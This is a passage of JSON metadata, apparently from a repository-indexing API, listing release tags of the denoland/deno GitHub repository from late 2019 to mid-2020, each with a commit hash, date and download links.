gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_